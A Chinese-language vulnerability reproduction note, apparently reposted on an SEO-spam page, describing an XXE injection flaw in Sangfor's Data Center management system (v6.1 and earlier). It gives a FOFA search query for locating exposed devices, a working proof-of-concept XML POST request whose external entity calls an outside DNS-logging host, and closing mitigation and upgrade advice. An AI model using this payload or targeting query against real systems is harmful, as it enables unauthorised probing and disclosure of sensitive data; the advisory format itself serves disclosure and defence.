当前位置: 首页 > news >正文

崇左网页设计石嘴山网站seo

崇左网页设计,石嘴山网站seo,淄博哪里做网站,1688全球批发平台0x01 产品简介 深信服数据中心管理系统DC为AC的外置数据中心,主要用于海量日志数据的异地扩展备份管理,多条件组合的高效查询,统计和趋势报表生成,设备运行状态监控等功能。 0x02 漏洞概述 深信服数据中心管理系统DC存在XML外部实…

0x01 产品简介

   深信服数据中心管理系统DC为AC的外置数据中心,主要用于海量日志数据的异地扩展备份管理,多条件组合的高效查询,统计和趋势报表生成,设备运行状态监控等功能。

0x02 漏洞概述

  深信服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析,攻击者可以利用该漏洞进行XML注入攻击,获取系统敏感信息。

0x03 影响范围

    v6.1及以下版本

0x04 复现环境

FOFA: "SANGFOR 数据中心"

0x05 漏洞复现 

PoC

POST /src/sangforindex HTTP/1.1
Host: your-ip
Content-Type: text/xml<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE root [<!ENTITY rt SYSTEM "http://dnslog.cn">
]>
<xxx>
&rt;
</xxx>

验证

0x06 修复建议

规避措施

将设备端口收缩内网,可削减漏洞被利用风险。

升级方案

2016年4月发布的数据中心管理系统v11.0及以上版本已修复,受影响用户可通过升级版本,完成对漏洞的修复。可拨打深信服漏洞专属修复热线400-005-5530获取或联系当地服务人员。

http://www.hrbkazy.com/news/48318.html

相关文章:

  • 分析网站做的好坏网站流量排行
  • div+css网站模板百度快照有什么用
  • 专业营销网站搜索排名提升
  • 门源县公司网站建设平台推广策略都有哪些
  • 免费下载软件的网站有哪些百度网盘网址是多少
  • 企业网站制作 西安新闻发稿渠道
  • 实体店面做网站推广要多少钱淄博seo
  • 在哪个网站上可以找兼职做推广赚钱一个50元
  • 网站建设七大步骤数据分析工具
  • seo做的比较好的网站东莞网站营销推广
  • 网站制作ppt企业如何做网络推广
  • 上海傲石设计网站网站优化价格
  • 学校门户网站开发搜索引擎优化包括哪些方面
  • 汽车网站正在建设中模板武汉网络推广seo
  • 扬州做网站哪家好手机百度极速版app下载安装
  • 网站建设最新资讯超级外链在线发布
  • 各大网站怎么把世界杯做头条黄冈seo
  • 做网站需要什么框架网络推广网络营销软件
  • 怎么做自己的发卡网站6windows优化大师免费版
  • 镇江网站建设门户报价爱站网工具
  • 郑州遗像制作百度seo技术优化
  • 中国十大电商公司自动优化句子的软件
  • 专业做网站建设设计品牌词优化
  • 厦门公司建站谷歌手机版浏览器官网
  • 常州网页模板建站seo网站排名查询
  • 苍南县龙港哪里有做网站网络营销公司哪家可靠
  • 虚拟主机空间 配置 网站seo网络优化日常工作内容
  • 网站建设dns解析设置近三年成功的营销案例
  • 怎样做自己的微商网站百度收录规则
  • 如何利用网站做推广高端营销型网站制作